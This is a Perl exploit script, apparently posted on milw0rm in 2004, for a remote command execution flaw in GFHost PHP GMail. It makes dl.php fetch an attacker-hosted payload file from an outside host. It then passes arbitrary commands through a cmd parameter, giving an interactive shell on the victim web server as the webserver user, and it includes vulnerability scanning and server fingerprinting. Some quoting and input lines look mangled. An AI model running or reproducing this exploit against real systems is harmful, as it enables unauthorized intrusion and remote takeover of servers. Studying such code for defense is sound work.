GFHost PHP GMail Remote Command Execution Exploit############################################## # GFHost explo # Spawn bash style Shell with webserver uid # Greetz SPAX, foxtwo, Zone-H # This Script is currently under development ############################################## use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U[1] = `/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=http://utenti.lycos.it/z00/xpl.gif&cmd=`; &intro; &scan; &choose; &command; &exit; sub intro { &help; &host; &server; sleep 1; }; sub host { print `\nHost or IP : `; $host=; chomp $host; if ($host eq ``){$host=`127.0.0.1`}; print `\nPort (enter to accept 80): `; $port=; chomp $port; if ($port =~/\D/ ){$port=`80`}; if ($port eq `` ) {$port = `80`}; }; sub server { my $X; print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`; $probe = `string`; my $output; my $webserver = `something`; &connect; for ($X=0; $X<=10; $X++){ $output = $results[$X]; if (defined $output){ if ($output =~/apache/){ $webserver = `apache` }; }; }; if ($webserver ne `apache`){ my $choice = `y`; chomp $choice; if ($choice =~/N/i) {&exit}; }else{ print `\n\nOK`; }; }; sub scan { my $status = `not_vulnerable`; print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`; my $loop; my $output; my $flag; $command=`dir`; for ($loop=1; $loop < @U; $loop++) { $flag = `0`; $url = $U[$loop]; $probe = `scan`; &connect; foreach $output (@results){ if ($output =~ /Directory/) { $flag = `1`; $status = `vulnerable`; }; }; if ($flag eq `0`) { }else{ }; }; if ($status eq `not_vulnerable`){ }; }; sub choose { my $choice=`1`; chomp $choice; if ($choice > @U){ &choose }; if ($choice =~/\D/g ){ &choose }; if ($choice == 0){ &other }; $url = $U[$choice]; }; sub other { my $other = ; chomp $other; $U[0] = $other; }; sub command { while ($command !~/quit/i) { print `[$host]\$ `; $command = ; chomp $command; if ($command =~/quit/i) { &exit }; if ($command =~/url/i) { &choose }; if ($command =~/scan/i) { &scan }; if ($command =~/help/i) { &help }; $command =~ s/\s/+/g; $probe = `command`; if ($command !~/quit|url|scan|help/) {&connect}; }; &exit; }; sub connect { my $connection = IO::Socket::INET->new ( Proto => `tcp`, PeerAddr => `$host`, PeerPort => `$port`, ) or die `\nSorry UNABLE TO CONNECT To $host On Port $port.\n`; $connection -> autoflush(1); if ($probe =~/command|scan/){ print $connection `GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n`; }elsif ($probe =~/string/) { print $connection `HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n`; }; while ( <$connection> ) { @results = <$connection>; }; close $connection; if ($probe eq `command`){ &output }; if ($probe eq `string`){ &output }; }; sub output{ my $display; if ($probe eq `string`) { my $X; for ($X=0; $X<=10; $X++) { $display = $results[$X]; if (defined $display){print `$display`;}; }; }else{ foreach $display (@results){ print `$display`; }; }; }; sub exit{ print `\n\n\n ORP`; exit; }; sub help { print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`; print `\n GFHost PHP GMail Command Execution Vulnerability by SPABAM 2004` ; print `\n http://www.zone-h.org/advisories/read/id=4904 `; print `\n GFHost.pl Exploit v1.1`; print `\n \n note.. Script under DEVEL`; print `\n`; print `\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)`; print `\n Command: SCAN URL HELP QUIT`; print `\n\n\n\n\n\n\n\n\n\n\n`; }; # milw0rm.com [2004-11-21]